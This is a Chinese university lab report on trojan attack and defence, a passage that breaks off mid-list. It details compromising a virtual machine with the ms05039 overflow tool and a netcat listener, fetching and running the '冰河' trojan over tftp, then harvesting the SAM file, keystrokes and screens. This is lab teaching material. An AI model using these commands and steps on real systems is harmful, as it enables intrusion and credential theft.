計算机网络安全实验报告07.docVIP

《计算机网络安全》实验报告 实验序号：7　　　　　　　　　　实验项目名称：木马攻击与防范实验 学号 姓名 专业、班 实验地点 实1-411 指导教师 实验时间 2011-11-22 一、实验目的及要求 理解和掌握木马传播和运行的机制，掌握检查和删除木马的技巧，学会防御木马的相关知识，加深对木马的安全防范意识。 二、实验设备（环境）及要求 Windows 2000 server，虚拟机 三、实验内容与步骤 实验任务一：“冰河”木马 本实验需要把真实主机作为攻击机，虚拟机作为靶机。即首先利用ms05039溢出工具入侵虚拟机，然后利用“冰河”木马实现对虚拟机的完全控制。最后对木马进行查杀。 实验任务二：“广外男生”木马 本实验将真实机作为攻击机，虚拟机作为靶机。真实机利用“广外男生”木马对虚拟机进行攻击，最终完全取得虚拟机的控制权。最后学习木马的查杀。 四、实验结果与数据处理 实验任务一：“冰河”木马 步骤1：入侵准备工作 1）下载和安装木马软件前，关闭杀毒软件的自动防护功能，避免程序会被当作病毒而强行终止。 2）运行G_CLIENT.EXE； 3）选择菜单“设置”-“配置服务程序”； 4）设置访问口令为“1234567”，其它为默认值，点击 “确定”生成木马的服务端程序G_SERVER.EXE。 5）将生成的木马服务程序G_SERVER.EXE拷贝到tftp服务的目录即C:\攻防\tftp32。 6）运行tftpd32.exe。保持此程序一直开启，用于等待攻击成功后传输木马服务程序。 步骤2：进行攻击，将木马放置在被攻击端 1)对靶机P3进行攻击，首先运行 nc -vv -l -p 99 接着再开一个dos窗口，运行 ms05039 3 99 1 2)攻击成功后，在运行nc -vv -l -p 99 的dos窗口中出现提示，若攻击不成功请参照“缓冲区溢出攻击与防范实验”，再次进行攻击。 3）在此窗口中运行 tftp -i get g_server.exe 将木马服务程序G_server.exe上传到靶机P3上，并直接输入g_server.exe使之运行。 步骤3：运行木马客户程序控制远程主机 1）打开程序端程序，单击快捷工具栏中的“添加主机”按扭，如图8所示。 “显示名称”：填入显示在主界面的名称“target” “主机地址”：填入服务器端主机的IP地址“3”。 “访问口令”：填入每次访问主机的密码，这里输入“1234567”。 “监听端口”：“冰河”默认的监听端口是7626，控制端可以修改它以绕过防火墙。 单击“确定”按扭，即可以看到主机面上添加了主机。 这时我们就可以像操作自己的电脑一样操作远程目标电脑，比如打开C:\WINNT\system32\config目录可以找到对方主机上保存用户口令的SAM文件。点击鼠标右键，可以发现有上传和下载功能。即可以随意将虚拟机器上的机密文件下载到本机上，也可以把恶意文件上传到该虚拟机上并运行。可见，其破坏性是巨大的。 2）“文件管理器”使用。点击各个驱动器或者文件夹前面的展开符号，可以浏览目标主机内容。 然后选中文件，在右键菜单中选中“下载文件至...”，在弹出的对话框中选好本地存储路径，点击“保存”。 2）“命令控制台”使用。单击“命令控制台”的标签，弹出命令控制台界面，验证控制的各种命令。 a. 口令类命令：展开“口令类命令”， a.1 “系统信息及口令”可以查看远程主机的系统信息，开机口令，缓存口令等。 a.2 “历史口令”可以查看远程主机以往使用的口令。 a.3 “击键记录”可以记录远程主机用户击键记录，以次可以分析出远程主机的各种帐号和口令或各种秘密信息。 b. 控制类命令：展开“控制类命令”， b.1 “捕获屏幕” 可以使控制端使用者查看远程主机的屏幕。 b.2 “发送信息” 可以向远程计算机发送Windows标准的各种信息。 b.3 “进程管理” 可以使控制者查看远程主机上所有的进程。单击“查看进程”按钮，就可以看到远程主机上存在的进程，甚至还可以终止某个进程，只要选中相应的进程，然后单击“终止进程”就可以了。 b.4 “窗口管理” 可以使远程主机上的窗口进行刷新，最大化，最小化，激活，隐藏等。 b.5 “系统管理” 可以使远程主机进行关机，重启，重新加载“冰河”，自动卸载“冰河”的操作。 b.6 “鼠标控制” 可以使远程主机上的鼠标锁定在某个范围内。 b.7 “其他控制” 可以使远程主机上进行自动拨号禁止，桌面隐藏，注册表锁定等操作。 c 网络类命令 展开“网络类命令”， c.1 “创建共享”在远程主机上创建自己的共享。 c.2 “删除共享”在远程主机上删除某个特定的共享。 c.3